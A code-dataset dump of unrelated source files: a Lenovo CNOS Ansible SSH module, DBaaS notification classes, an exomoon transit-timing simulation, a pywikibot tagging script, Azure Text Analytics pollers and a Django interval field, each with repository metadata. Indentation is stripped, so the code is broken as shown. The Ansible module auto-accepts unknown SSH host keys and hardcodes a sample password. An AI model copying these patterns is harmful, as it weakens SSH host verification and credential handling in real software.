#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Module to send Conditional CLI commands to Lenovo Switches
# Lenovo Networking
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cnos_conditional_command
author: "Dave Kasberg (@dkasberg)"
short_description: Execute a single command based on condition on devices running Lenovo CNOS
description:
- This module allows you to modify the running configuration of a switch. It provides a way to
execute a single CNOS command on a network device by evaluating the current running configuration
and executing the command only if the specific settings have not been already configured.
The CNOS command is passed as an argument of the method.
This module functions the same as the cnos_command module.
The only exception is that the following inventory variable can be specified
["condition = <flag string>"]
When this inventory variable is specified as the variable of a task, the command is executed for
the network element that matches the flag string. Usually, commands are executed across a group
of network devices. When there is a requirement to skip the execution of the command on one or
more devices, it is recommended to use this module.
This module uses SSH to manage network device configuration.
For more information about this module from Lenovo and customizing it usage for your
use cases, please visit U(http://systemx.lenovofiles.com/help/index.jsp?topic=%2Fcom.lenovo.switchmgt.ansible.doc%2Fcnos_conditional_command.html)
version_added: "2.3"
extends_documentation_fragment: cnos
options:
clicommand:
description:
- This specifies the CLI command as an attribute to this method. The command is passed using
double quotes. The variables can be placed directly on to the CLI commands or can be invoked
from the vars directory.
required: true
default: Null
condition:
description:
- If you specify condition=false in the inventory file against any device, the command execution
is skipped for that device.
required: true
default: Null
flag:
description:
- If a task needs to be executed, you have to set the flag the same as it is specified in the
inventory for that device.
required: true
default: Null
'''
EXAMPLES = '''
Tasks : The following are examples of using the module cnos_conditional_command. These are written in the main.yml file of the tasks directory.
---
- name: Applying CLI template on VLAG Tier1 Leaf Switch1
cnos_conditional_command:
host: "{{ inventory_hostname }}"
username: "{{ hostvars[inventory_hostname]['username'] }}"
password: "{{ hostvars[inventory_hostname]['password'] }}"
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
enablePassword: "{{ hostvars[inventory_hostname]['enablePassword'] }}"
outputfile: "./results/test_conditional_command_{{ inventory_hostname }}_output.txt"
condition: "{{ hostvars[inventory_hostname]['condition']}}"
flag: leaf_switch2
command: "spanning-tree mode enable"
enablePassword: "anil"
'''
RETURN = '''
msg:
description: Success or failure message
returned: always
type: string
sample: "Command Applied"
'''
import sys
try:
import paramiko
HAS_PARAMIKO = True
except ImportError:
HAS_PARAMIKO = False
import time
import socket
import array
import json
import time
import re
try:
from ansible.module_utils import cnos
HAS_LIB = True
except:
HAS_LIB = False
from ansible.module_utils.basic import AnsibleModule
from collections import defaultdict
def main():
module = AnsibleModule(
argument_spec=dict(
clicommand=dict(required=True),
outputfile=dict(required=True),
condition=dict(required=True),
flag=dict(required=True),
host=dict(required=True),
deviceType=dict(required=True),
username=dict(required=True),
password=dict(required=True, no_log=True),
enablePassword=dict(required=False, no_log=True), ), supports_check_mode=False)
username = module.params['username']
password = module.params['password']
enablePassword = module.params['enablePassword']
condition = module.params['condition']
flag = module.params['flag']
cliCommand = module.params['clicommand']
outputfile = module.params['outputfile']
deviceType = module.params['deviceType']
hostIP = module.params['host']
output = ""
if not HAS_PARAMIKO:
module.fail_json(msg='paramiko is required for this module')
if (condition != flag):
module.exit_json(changed=True, msg="Command Skipped for this value")
return " "
# Create instance of SSHClient object
remote_conn_pre = paramiko.SSHClient()
# Automatically add untrusted hosts (make sure okay for security policy in your environment)
remote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# initiate SSH connection with the switch
remote_conn_pre.connect(hostIP, username=username, password=password)
time.sleep(2)
# Use invoke_shell to establish an 'interactive session'
remote_conn = remote_conn_pre.invoke_shell()
time.sleep(2)
# Enable and enter configure terminal then send command
#
# Enable and enter configure terminal then send command
output = output + cnos.waitForDeviceResponse("\n", ">", 2, remote_conn)
output = output + cnos.enterEnableModeForDevice(enablePassword, 3, remote_conn)
# Make terminal length = 0
output = output + cnos.waitForDeviceResponse("terminal length 0\n", "#", 2, remote_conn)
# Go to config mode
output = output + cnos.waitForDeviceResponse("configure d\n", "(config)#", 2, remote_conn)
# Send the CLi command
output = output + cnos.waitForDeviceResponse(cliCommand + "\n", "(config)#", 2, remote_conn)
# Save it into the file
file = open(outputfile, "a")
file.write(output)
file.close()
# Logic to check when changes occur or not
errorMsg = cnos.checkOutputForError(output)
if(errorMsg is None):
module.exit_json(changed=True, msg="CLI Command executed and results saved in file ")
else:
module.fail_json(msg=errorMsg)
if __name__ == '__main__':
main()
|
gpl-3.0
| -3,509,905,239,353,352,700
| 36.953368
| 150
| 0.694608
| false
| 4.241459
| true
| false
| false
|
globocom/database-as-a-service
|
dbaas/notification/management/arguments/factory.py
|
1
|
4756
|
class ArgumentsTo(object):
KEY = ''
def __init__(self, args):
self.args = args
def build(self):
raise NotImplementedError
@property
def database_name(self):
return self.args['database'].name
def get_database_arg(self):
return "Database: {}".format(self.database_name)
def get_environment_arg(self):
return "Environment: {}".format(self.args['environment'])
def get_plan_arg(self):
return "Plan: {}".format(self.args['plan'])
def get_project_arg(self):
return "Project: {}".format(self.args['project'])
def get_user_arg(self):
return "User: {}".format(self.args['user'])
def get_clone_arg(self):
return "Clone: {}".format(self.args['clone_name'])
class ArgumentsToCreateDatabase(ArgumentsTo):
KEY = 'notification.tasks.create_database'
def build(self):
return [
self.get_database_arg(),
self.get_environment_arg(),
self.get_project_arg(),
self.get_plan_arg(),
]
@property
def database_name(self):
return self.args['name']
class ArgumentsToResizeDatabase(ArgumentsTo):
KEY = 'notification.tasks.resize_database'
def build(self):
return [
self.get_database_arg(),
"New VM Offering: {}".format(self.args['offering']),
]
class ArgumentsToUpgradeDatabase(ArgumentsTo):
KEY = 'notification.tasks.upgrade_database'
def build(self):
return [
self.get_database_arg(),
"Target plan: {}".format(
self.args['database'].databaseinfra.plan.engine_equivalent_plan
),
]
class ArgumentsToUpgradeDatabasePatch(ArgumentsTo):
KEY = 'notification.tasks.upgrade_database_patch'
def build(self):
return [
self.get_database_arg(),
"New patch: {}".format(self.args['patch']),
]
class ArgumentsToReinstallVM(ArgumentsTo):
KEY = 'notification.tasks.reinstall_vm'
def build(self):
return [
self.get_database_arg(),
"Instance: {}".format(
self.args['instance']
),
]
class ArgumentsToDiskResize(ArgumentsTo):
KEY = 'notification.tasks.database_disk_resize'
def build(self):
return [
self.get_database_arg(),
"New Disk Offering: {}".format(self.args['disk_offering']),
]
class ArgumentsToRestoreSnapshot(ArgumentsTo):
KEY = 'backup.tasks.restore_snapshot'
def build(self):
return [
self.get_database_arg(),
"Description: Restoring to an older version. It will finish soon.",
]
class ArgumentsToDestroyDatabase(ArgumentsTo):
KEY = 'notification.tasks.destroy_database'
def build(self):
return [
self.get_database_arg(),
self.get_user_arg(),
]
class ArgumentsToCloneDatabase(ArgumentsTo):
KEY = 'notification.tasks.clone_database'
def build(self):
return [
self.get_database_arg(),
self.get_clone_arg(),
self.get_environment_arg(),
self.get_plan_arg(),
]
@property
def database_name(self):
return self.args['origin_database'].name
class ArgumentsToAnalyzeDatabases(ArgumentsTo):
KEY = 'dbaas_services.analyzing.tasks.analyze.analyze_databases'
def build(self):
return [
"Description: Analyzing all databases",
]
class ArgumentsToUpgradeMongo24To30(ArgumentsTo):
KEY = 'notification.tasks.upgrade_mongodb_24_to_30'
def build(self):
return [
self.get_database_arg(),
]
class ArgumentsToUnbindAddress(ArgumentsTo):
KEY = 'dbaas_aclapi.tasks.unbind_address_on_database'
def build(self):
return [
"Removing Binds For: {}".format(self.args['database_bind']),
self.get_database_arg(),
]
@property
def database_name(self):
return self.args['database_bind'].database.name
class ArgumentsToBindAddress(ArgumentsTo):
KEY = 'dbaas_aclapi.tasks.bind_address_on_database'
def build(self):
return [
"Creating Binds For: {}".format(self.args['database_bind']),
self.get_database_arg(),
]
@property
def database_name(self):
return self.args['database_bind'].database.name
class ArgumentsToRemoveReadOnlyInstance(ArgumentsTo):
KEY = 'notification.tasks.remove_readonly_instance'
def build(self):
return [
"Removing read only instance from {}".format(self.get_database_arg()),
"Instance: {}".format(self.args['instance'])
]
|
bsd-3-clause
| 1,724,527,907,496,791,300
| 24.031579
| 82
| 0.597351
| false
| 4.05802
| false
| false
| false
|
hippke/TTV-TDV-exomoons
|
create_figures/system_20.py
|
1
|
7712
|
"""n-body simulator to derive TDV+TTV diagrams of planet-moon configurations.
Credit for part of the source is given to
https://github.com/akuchling/50-examples/blob/master/gravity.rst
Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License
"""
import numpy
import math
import matplotlib.pylab as plt
from modified_turtle import Turtle
from phys_const import *
class Body(Turtle):
"""Subclass of Turtle representing a gravitationally-acting body"""
name = 'Body'
vx = vy = 0.0 # velocities in m/s
px = py = 0.0 # positions in m
def attraction(self, other):
"""(Body): (fx, fy) Returns the force exerted upon this body by the other body"""
# Distance of the other body
sx, sy = self.px, self.py
ox, oy = other.px, other.py
dx = (ox-sx)
dy = (oy-sy)
d = math.sqrt(dx**2 + dy**2)
# Force f and direction to the body
f = G * self.mass * other.mass / (d**2)
theta = math.atan2(dy, dx)
# direction of the force
fx = math.cos(theta) * f
fy = math.sin(theta) * f
return fx, fy
def loop(bodies, orbit_duration):
"""([Body]) Loops and updates the positions of all the provided bodies"""
# Calculate the duration of our simulation: One full orbit of the outer moon
seconds_per_day = 24*60*60
timesteps_per_day = 1000
timestep = seconds_per_day / timesteps_per_day
total_steps = int(orbit_duration / 3600 / 24 * timesteps_per_day)
#print total_steps, orbit_duration / 24 / 60 / 60
for body in bodies:
body.penup()
body.hideturtle()
for step in range(total_steps):
for body in bodies:
if body.name == 'planet':
# Add current position and velocity to our list
tdv_list.append(body.vx)
ttv_list.append(body.px)
force = {}
for body in bodies:
# Add up all of the forces exerted on 'body'
total_fx = total_fy = 0.0
for other in bodies:
# Don't calculate the body's attraction to itself
if body is other:
continue
fx, fy = body.attraction(other)
total_fx += fx
total_fy += fy
# Record the total force exerted
force[body] = (total_fx, total_fy)
# Update velocities based upon on the force
for body in bodies:
fx, fy = force[body]
body.vx += fx / body.mass * timestep
body.vy += fy / body.mass * timestep
# Update positions
body.px += body.vx * timestep
body.py += body.vy * timestep
#body.goto(body.px*SCALE, body.py*SCALE)
#body.dot(3)
def run_sim(R_star, transit_duration, bodies):
"""Run 3-body sim and convert results to TTV + TDV values in [minutes]"""
# Run 3-body sim for one full orbit of the outermost moon
loop(bodies, orbit_duration)
# Move resulting data from lists to numpy arrays
ttv_array = numpy.array([])
ttv_array = ttv_list
tdv_array = numpy.array([])
tdv_array = tdv_list
# Zeropoint correction
middle_point = numpy.amin(ttv_array) + numpy.amax(ttv_array)
ttv_array = numpy.subtract(ttv_array, 0.5 * middle_point)
ttv_array = numpy.divide(ttv_array, 1000) # km/s
# Compensate for barycenter offset of planet at start of simulation:
planet.px = 0.5 * (gravity_firstmoon + gravity_secondmoon)
stretch_factor = 1 / ((planet.px / 1000) / numpy.amax(ttv_array))
ttv_array = numpy.divide(ttv_array, stretch_factor)
# Convert to time units, TTV
ttv_array = numpy.divide(ttv_array, R_star)
ttv_array = numpy.multiply(ttv_array, transit_duration * 60 * 24) # minutes
# Convert to time units, TDV
oldspeed = (2 * R_star / transit_duration) * 1000 / 24 / 60 / 60 # m/sec
newspeed = oldspeed - numpy.amax(tdv_array)
difference = (transit_duration - (transit_duration * newspeed / oldspeed)) * 24 * 60
conversion_factor = difference / numpy.amax(tdv_array)
tdv_array = numpy.multiply(tdv_array, conversion_factor)
return ttv_array, tdv_array
"""Main routine"""
# Set variables and constants. Do not change these!
G = 6.67428e-11 # Gravitational constant G
SCALE = 5e-07 # [px/m] Only needed for plotting during nbody-sim
tdv_list = []
ttv_list = []
R_star = 6.96 * 10**5 # [km], solar radius
transit_duration = (2*pi/sqrt(G*(M_sun+M_jup)/a_jup**3)*R_sun/(pi*a_jup)*sqrt((1+R_jup/R_sun)**2))/60/60/24 # transit duration without a moon, Eq. (C1) Kipping (2009b, MNRAS), for q = 0
print transit_duration
planet = Body()
planet.name = 'planet'
planet.mass = M_jup
#semimajor_axis = 1. * AU #[m]
semimajor_axis = a_jup
stellar_mass = M_sun
radius_hill = semimajor_axis * (planet.mass / (3 * (stellar_mass))) ** (1./3)
# Define parameters
firstmoon = Body()
firstmoon.mass = M_gan
firstmoon.px = 0.4218 * 10**9
secondmoon = Body()
secondmoon.mass = M_gan
secondmoon.px = 0.48945554 * 10**9
thirdmoon = Body()
thirdmoon.mass = M_gan
thirdmoon.px = 0.59293316 * 10**9
fourthmoon = Body()
fourthmoon.mass = M_gan
fourthmoon.px = 1.23335068 * 10**9
# Calculate start velocities
firstmoon.vy = math.sqrt(G * planet.mass * (2 / firstmoon.px - 1 / firstmoon.px))
secondmoon.vy = math.sqrt(G * planet.mass * (2 / secondmoon.px - 1 / secondmoon.px))
thirdmoon.vy = math.sqrt(G * planet.mass * (2 / thirdmoon.px - 1 / thirdmoon.px))
fourthmoon.vy = math.sqrt(G * planet.mass * (2 / fourthmoon.px - 1 / fourthmoon.px))
planet.vy = (-secondmoon.vy * secondmoon.mass - firstmoon.vy * firstmoon.mass) / planet.mass
# Calculate planet displacement. This holds for circular orbits
gravity_firstmoon = (firstmoon.mass / planet.mass) * firstmoon.px
gravity_secondmoon = (secondmoon.mass / planet.mass) * secondmoon.px
gravity_thirdmoon = (thirdmoon.mass / planet.mass) * thirdmoon.px
gravity_fourthmoon = (fourthmoon.mass / planet.mass) * fourthmoon.px
planet.px = 0.5 * (gravity_firstmoon + gravity_secondmoon + gravity_thirdmoon + gravity_fourthmoon)
# Use the outermost moon to calculate the length of one full orbit duration
orbit_duration = math.sqrt((4 * math.pi**2 *fourthmoon.px ** 3) / (G * (fourthmoon.mass + planet.mass)))
orbit_duration = orbit_duration * 1.002
# Run simulation. Make sure to add/remove the moons you want to simulate!
ttv_array, tdv_array = run_sim(
R_star,
transit_duration,
[planet, firstmoon, secondmoon, thirdmoon, fourthmoon])
# Output information
print 'TTV amplitude =', numpy.amax(ttv_array), \
'[min] = ', numpy.amax(ttv_array) * 60, '[sec]'
print 'TDV amplitude =', numpy.amax(tdv_array), \
'[min] = ', numpy.amax(tdv_array) * 60, '[sec]'
ax = plt.axes()
plt.plot(ttv_array, tdv_array, color = 'k')
plt.rc('font', **{'family': 'serif', 'serif': ['Computer Modern']})
plt.rc('text', usetex=True)
plt.tick_params(axis='both', which='major', labelsize = 16)
plt.xlabel('transit timing variation [minutes]', fontsize = 16)
plt.ylabel('transit duration variation [minutes]', fontsize = 16)
ax.tick_params(direction='out')
plt.ylim([numpy.amin(tdv_array) * 1.2, numpy.amax(tdv_array) * 1.2])
plt.xlim([numpy.amin(ttv_array) * 1.2, numpy.amax(ttv_array) * 1.2])
plt.plot((0, 0), (numpy.amax(tdv_array) * 10., numpy.amin(tdv_array) * 10.), 'k', linewidth=0.5)
plt.plot((numpy.amin(ttv_array) * 10., numpy.amax(ttv_array) * 10.), (0, 0), 'k', linewidth=0.5)
# Fix axes for comparison with eccentric moon
plt.xlim(-0.11, +0.11)
plt.ylim(-0.8, +0.8)
plt.annotate(r"5:4:3:1", xy=(-0.105, +0.7), size=16)
plt.savefig("fig_system_20.eps", bbox_inches = 'tight')
|
mit
| -120,625,737,298,135,980
| 34.539171
| 185
| 0.638485
| false
| 2.944635
| false
| false
| false
|
alemela/alessiobot
|
script/add_immagine_orfana.py
|
1
|
2591
|
# -*- coding: utf-8 -*-
import pywikibot, re, subprocess
from pywikibot import pagegenerators
import time, sys
start = time.clock()
args = pywikibot.handleArgs()
site = pywikibot.Site('it', 'wikipedia')
today = time.strftime("%Y%m%d")
if sys.argv[1] == "immagini_orfane_libere":
path = '/data/project/alessiobot/data/immagini_orfane/immagini_orfane_libere/'+today+'.txt'
template = u'{{Immagine orfana|libera}}'
comment = u'Bot: immagine orfana con licenza libera'
elif sys.argv[1] == "immagini_orfane_non_libere":
path = '/data/project/alessiobot/data/immagini_orfane/immagini_orfane_non_libere/'+today+'.txt'
template = u'{{Immagine orfana|non libera}}'
comment = u'Bot: immagine orfana con licenza non libera'
elif sys.argv[1] == "immagini_orfane_pd_italia":
path = '/data/project/alessiobot/data/immagini_orfane/immagini_orfane_pd_italia/'+today+'.txt'
template = u'{{Immagine orfana|PD-Italia}}'
comment = u'Bot: immagine orfana con licenza PD italia'
elif sys.argv[1] == "immagini_orfane_sconosciute":
path = '/data/project/alessiobot/data/immagini_orfane/immagini_orfane_sconosciute/'+today+'.txt'
template = u'{{Immagine orfana}}'
comment = u'Bot: immagine orfana con licenza sconosciuta'
else:
print "Unvalid type of licence"
exit()
has_template = r'\{\{(?:template:|)(immagine_orfana)[\|\}]'
def main():
add_lists = pagegenerators.TextfilePageGenerator(path)
for page in add_lists:
# Check if the page exists or if there's already the template
try:
oldtxt = page.get()
except pywikibot.NoPage:
pywikibot.output(u"%s doesn't exist! Skip" % page.title())
continue
except pywikibot.IsRedirectPage:
pywikibot.output(u"%s is redirect, skip" % page.title(asLink=True))
return
check_notice = re.findall(has_template, oldtxt.lower())
if check_notice != []:
pywikibot.output(u'Template alreday in %s, skip' % page.title())
continue
# Ok, the page need the template. Let's put it there!
newtxt = u"%s\n%s" % (template, oldtxt)
try:
page.put(newtxt, comment)
pywikibot.output(u"\t\t>>> %s <<<" % page.title())
# pywikibot.output(u"editing!!!")
except pywikibot.LockedPage:
pywikibot.output(u'%s is a locked page! Skip' %page.title())
continue
except pywikibot.EditConflict:
pywikibot.output(u'Edit Conflict! Skip')
continue
if __name__ == "__main__":
try:
main()
finally:
pywikibot.stopme()
end=time.clock()
print "Run time: ", end-start
|
mit
| 921,331,364,314,386,600
| 34.013514
| 100
| 0.657661
| false
| 2.988466
| false
| false
| false
|
Azure/azure-sdk-for-python
|
sdk/textanalytics/azure-ai-textanalytics/azure/ai/textanalytics/aio/_lro_async.py
|
1
|
11430
|
# coding=utf-8
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
import datetime
from typing import Optional
from azure.core.exceptions import HttpResponseError
from azure.core.polling import AsyncLROPoller
from azure.core.polling.base_polling import OperationFailed, BadStatus
from azure.core.polling.async_base_polling import AsyncLROBasePolling
from azure.core.polling._async_poller import PollingReturnType
_FINISHED = frozenset(["succeeded", "cancelled", "failed", "partiallycompleted"])
_FAILED = frozenset(["failed"])
_SUCCEEDED = frozenset(["succeeded", "partiallycompleted"])
class TextAnalyticsAsyncLROPollingMethod(AsyncLROBasePolling):
def finished(self):
"""Is this polling finished?
:rtype: bool
"""
return TextAnalyticsAsyncLROPollingMethod._finished(self.status())
@staticmethod
def _finished(status):
if hasattr(status, "value"):
status = status.value
return str(status).lower() in _FINISHED
@staticmethod
def _failed(status):
if hasattr(status, "value"):
status = status.value
return str(status).lower() in _FAILED
@staticmethod
def _raise_if_bad_http_status_and_method(response):
"""Check response status code is valid.
Must be 200, 201, 202, or 204.
:raises: BadStatus if invalid status.
"""
code = response.status_code
if code in {200, 201, 202, 204}:
return
raise BadStatus(
"Invalid return status {!r} for {!r} operation".format(
code, response.request.method
)
)
async def _poll(self): # pylint:disable=invalid-overridden-method
"""Poll status of operation so long as operation is incomplete and
we have an endpoint to query.
:param callable update_cmd: The function to call to retrieve the
latest status of the long running operation.
:raises: OperationFailed if operation status 'Failed' or 'Canceled'.
:raises: BadStatus if response status invalid.
:raises: BadResponse if response invalid.
"""
while not self.finished():
await self._delay()
await self.update_status()
if TextAnalyticsAsyncLROPollingMethod._failed(self.status()):
raise OperationFailed("Operation failed or canceled")
final_get_url = self._operation.get_final_get_url(self._pipeline_response)
if final_get_url:
self._pipeline_response = await self.request_status(final_get_url)
TextAnalyticsAsyncLROPollingMethod._raise_if_bad_http_status_and_method(
self._pipeline_response.http_response
)
class AsyncAnalyzeHealthcareEntitiesLROPollingMethod(
TextAnalyticsAsyncLROPollingMethod
):
def __init__(self, *args, **kwargs):
self._text_analytics_client = kwargs.pop("text_analytics_client")
super(AsyncAnalyzeHealthcareEntitiesLROPollingMethod, self).__init__(
*args, **kwargs
)
@property
def _current_body(self):
from .._generated.v3_1.models import JobMetadata
return JobMetadata.deserialize(self._pipeline_response)
@property
def created_on(self):
if not self._current_body:
return None
return self._current_body.created_date_time
@property
def expires_on(self):
if not self._current_body:
return None
return self._current_body.expiration_date_time
@property
def last_modified_on(self):
if not self._current_body:
return None
return self._current_body.last_update_date_time
@property
def id(self):
if not self._current_body:
return None
return self._current_body.job_id
class AsyncAnalyzeHealthcareEntitiesLROPoller(AsyncLROPoller[PollingReturnType]):
def polling_method(self) -> AsyncAnalyzeHealthcareEntitiesLROPollingMethod: # type: ignore
"""Return the polling method associated to this poller."""
return self._polling_method # type: ignore
@property
def created_on(self) -> datetime.datetime:
"""When your healthcare entities job was created
:return: When your healthcare entities job was created
:rtype: ~datetime.datetime
"""
return self.polling_method().created_on
@property
def expires_on(self) -> datetime.datetime:
"""When your healthcare entities job will expire
:return: When your healthcare entities job will expire
:rtype: ~datetime.datetime
"""
return self.polling_method().expires_on
@property
def last_modified_on(self) -> datetime.datetime:
"""When your healthcare entities job was last modified
:return: When your healthcare entities job was last modified
:rtype: ~datetime.datetime
"""
return self.polling_method().last_modified_on
@property
def id(self) -> str:
"""ID of your call to :func:`begin_analyze_healthcare_entities`
:return: ID of your call to :func:`begin_analyze_healthcare_entities`
:rtype: str
"""
return self.polling_method().id
async def cancel( # type: ignore
self, **kwargs
) -> "AsyncLROPoller[None]":
"""Cancel the operation currently being polled.
:keyword int polling_interval: The polling interval to use to poll the cancellation status.
The default value is 5 seconds.
:return: Returns an instance of an AsyncLROPoller that returns None.
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError: When the operation has already reached a terminal state.
.. admonition:: Example:
.. literalinclude:: ../samples/async_samples/sample_analyze_healthcare_entities_with_cancellation_async.py
:start-after: [START analyze_healthcare_entities_with_cancellation_async]
:end-before: [END analyze_healthcare_entities_with_cancellation_async]
:language: python
:dedent: 4
:caption: Cancel an existing health operation.
"""
polling_interval = kwargs.pop("polling_interval", 5)
await self.polling_method().update_status()
try:
return await getattr(
self._polling_method, "_text_analytics_client"
).begin_cancel_health_job(
self.id,
polling=TextAnalyticsAsyncLROPollingMethod(timeout=polling_interval),
)
except HttpResponseError as error:
from .._response_handlers import process_http_response_error
process_http_response_error(error)
class AsyncAnalyzeActionsLROPollingMethod(TextAnalyticsAsyncLROPollingMethod):
@property
def _current_body(self):
from .._generated.v3_1.models import AnalyzeJobMetadata
return AnalyzeJobMetadata.deserialize(self._pipeline_response)
@property
def created_on(self):
if not self._current_body:
return None
return self._current_body.created_date_time
@property
def display_name(self):
if not self._current_body:
return None
return self._current_body.display_name
@property
def expires_on(self):
if not self._current_body:
return None
return self._current_body.expiration_date_time
@property
def actions_failed_count(self):
if not self._current_body:
return None
return self._current_body.additional_properties["tasks"]["failed"]
@property
def actions_in_progress_count(self):
if not self._current_body:
return None
return self._current_body.additional_properties["tasks"]["inProgress"]
@property
def actions_succeeded_count(self):
if not self._current_body:
return None
return self._current_body.additional_properties["tasks"]["completed"]
@property
def last_modified_on(self):
if not self._current_body:
return None
return self._current_body.last_update_date_time
@property
def total_actions_count(self):
if not self._current_body:
return None
return self._current_body.additional_properties["tasks"]["total"]
@property
def id(self):
if not self._current_body:
return None
return self._current_body.job_id
class AsyncAnalyzeActionsLROPoller(AsyncLROPoller[PollingReturnType]):
def polling_method(self) -> AsyncAnalyzeActionsLROPollingMethod: # type: ignore
"""Return the polling method associated to this poller."""
return self._polling_method # type: ignore
@property
def created_on(self) -> datetime.datetime:
"""When your analyze job was created
:return: When your analyze job was created
:rtype: ~datetime.datetime
"""
return self.polling_method().created_on
@property
def display_name(self) -> Optional[str]:
"""The display name of your :func:`begin_analyze_actions` call.
Corresponds to the `display_name` kwarg you pass to your
:func:`begin_analyze_actions` call.
:return: The display name of your :func:`begin_analyze_actions` call.
:rtype: str
"""
return self.polling_method().display_name
@property
def expires_on(self) -> datetime.datetime:
"""When your analyze job will expire
:return: When your analyze job will expire
:rtype: ~datetime.datetime
"""
return self.polling_method().expires_on
@property
def actions_failed_count(self) -> int:
"""Total number of actions that have failed
:return: Total number of actions that have failed
:rtype: int
"""
return self.polling_method().actions_failed_count
@property
def actions_in_progress_count(self) -> int:
"""Total number of actions currently in progress
:return: Total number of actions currently in progress
:rtype: int
"""
return self.polling_method().actions_in_progress_count
@property
def actions_succeeded_count(self) -> int:
"""Total number of actions that succeeded
:return: Total number of actions that succeeded
:rtype: int
"""
return self.polling_method().actions_succeeded_count
@property
def last_modified_on(self) -> datetime.datetime:
"""The last time your actions results were updated
:return: The last time your actions results were updated
:rtype: ~datetime.datetime
"""
return self.polling_method().last_modified_on
@property
def total_actions_count(self) -> int:
"""Total number of actions you submitted
:return: Total number of actions submitted
:rtype: int
"""
return self.polling_method().total_actions_count
@property
def id(self) -> str:
"""ID of your :func:`begin_analyze_actions` call.
:return: ID of your :func:`begin_analyze_actions` call.
:rtype: str
"""
return self.polling_method().id
|
mit
| -4,780,159,262,981,646,000
| 31.844828
| 118
| 0.636308
| false
| 4.404624
| false
| false
| false
|
dbservice/dbservice
|
dbservice/apps/utils/fields.py
|
1
|
5914
|
import re
from dateutil.relativedelta import relativedelta
from django.core.exceptions import ValidationError
from django.db import models
from django.utils.translation import ugettext_lazy as _
import psycopg2.extensions
def _parse_opt_num(s):
if not s:
# For the ISO 8601 duration specifications, fields need not be
# explicitly included if their value is zero --- None from regexp
# should become 0.
return 0
try:
# Prefer integers. Only last specified field is allowed to contain a
# fractional part, though we don't explicitly check this.
# TODO: Check; is this still necessary/relevant/preferable to using
# float() for all fields?
return int(s)
except ValueError:
return float(s.replace(',', '.'))
# PnW
ISO_WEEK_RX = re.compile(
r'^P(\d+(?:[.,]\d*)?)W$')
# P[nY][nM][nD][T[nH][nM][nS]]
ISO_RX = re.compile(
r'^P'
r'(?:(\d+(?:[.,]\d*)?)Y)?' # year
r'(?:(\d+(?:[.,]\d*)?)M)?' # month
r'(?:(\d+(?:[.,]\d*)?)D)?' # day
r'(?:T' # start optional time part
r'(?:(\d+(?:[.,]\d*)?)H)?' # hour
r'(?:(\d+(?:[.,]\d*)?)M)?' # minute
r'(?:(\d+(?:[.,]\d*)?)S)?' # second
r')?' # end optional time part
r'$')
def _iso8601_to_relativedelta(s):
"""
Parse a duration specification in the accepted ISO 8601 formats
'PnYnMnDTnHnMnS' or 'PnW' to a ``relativedelta`` object.
"""
match = ISO_RX.match(s)
if match:
years, months, days, hours, minutes, seconds = \
[_parse_opt_num(n) for n in match.groups()]
return relativedelta(
years=years, months=months, days=days,
hours=hours, minutes=minutes, seconds=seconds)
match = ISO_WEEK_RX.match(s)
if match:
weeks = _parse_opt_num(match.groups()[0])
return relativedelta(weeks=weeks)
raise ValueError('Invalid ISO 8601 duration string %s' % s)
def _relativedelta_to_iso8601(val):
"""
Construct an ISO 8601 duration specification string from the provided
``relativedelta`` object.
"""
if val.leapdays:
raise ValueError('"leapdays" not representable')
if any([getattr(val, f) is not None for f in (
'year', 'month', 'day', 'weekday',
'hour', 'minute', 'second', 'microsecond')]):
raise ValueError(
'relativedelta {} represents an absoluet timestamp; '
'not a duration'.format(val))
seconds = val.seconds
if val.microseconds:
seconds += val.microseconds / 1000000.0
return 'P{years}Y{months}M{days}DT{hours}H{minutes}M{seconds}S'.format(
years=val.years, months=val.months, days=val.days,
hours=val.hours, minutes=val.minutes, seconds=seconds)
# [Y year[s]] [M mon[s]] [D day[s]] [HH:MM:SS[.s*]
POSTGRES_RX = re.compile(
r'^'
r'(?:(\d+) years? ?)?'
r'(?:(\d+) mons? ?)?'
r'(?:(\d+) days? ?)?'
r'(?:' # start optional time part
r'(\d+):(\d+):(\d+(?:\.\d*)?)'
r')?' # end optional time part
r'$')
def _postgres_to_relativedelta(s):
"""
Parse interval output in the default "postgres" style for PostgreSQL into a
``relativedelta``.
"""
match = POSTGRES_RX.match(s)
if match:
years, months, days, hours, minutes, seconds = [
_parse_opt_num(n) for n in match.groups()]
return relativedelta(
years=years, months=months, days=days,
hours=hours, minutes=minutes, seconds=seconds)
raise ValueError('Unrecognized postgres interval string \'%s\'' % s)
# Set "output" type for INTERVALs from the DB to be relativedelta.
INTERVAL2RELATIVEDELTA = psycopg2.extensions.new_type(
psycopg2.extensions.INTERVAL.values,
'INTERVAL2RELATIVEDELTA',
lambda value, curs:
_postgres_to_relativedelta(value) if value is not None else None)
psycopg2.extensions.register_type(INTERVAL2RELATIVEDELTA)
# Set conversion of relativedelta on "input" to the DB to be an appropriate ISO
# 8601 duration string.
def _adapt_relativedelta(val):
return psycopg2.extensions.AsIs("'{}'".format(
_relativedelta_to_iso8601(val)))
psycopg2.extensions.register_adapter(relativedelta, _adapt_relativedelta)
class IntervalField(models.Field):
description = 'A time interval'
__metaclass__ = models.SubfieldBase
default_error_messages = {
'invalid': _("'%s' value has an invalid format. It must be in "
"ISO 8601 duration (PnYnMnDTnHnMnS or PnW) format."),
}
def db_type(self, connection):
if connection.settings_dict['ENGINE'] != \
'django.db.backends.postgresql_psycopg2':
raise NotImplementedError('only implemented for PostgreSQL')
return 'interval'
def to_python(self, value):
if isinstance(value, relativedelta):
return value
if value is None or value == '':
return None
try:
return _iso8601_to_relativedelta(value)
except ValueError:
# any parse error becomes the same "invalid" error...
msg = self.error_messages['invalid'] % value
raise ValidationError(msg)
def get_db_prep_value(self, value, connection, prepared=False):
if connection.settings_dict['ENGINE'] != \
'django.db.backends.postgresql_psycopg2':
raise NotImplementedError('only implemented for PostgreSQL')
return super().get_db_prep_value(
value, connection, prepared)
def value_to_string(self, obj):
value = self._get_val_from_obj(obj)
if value is None:
return ''
else:
return _relativedelta_to_iso8601(value)
try:
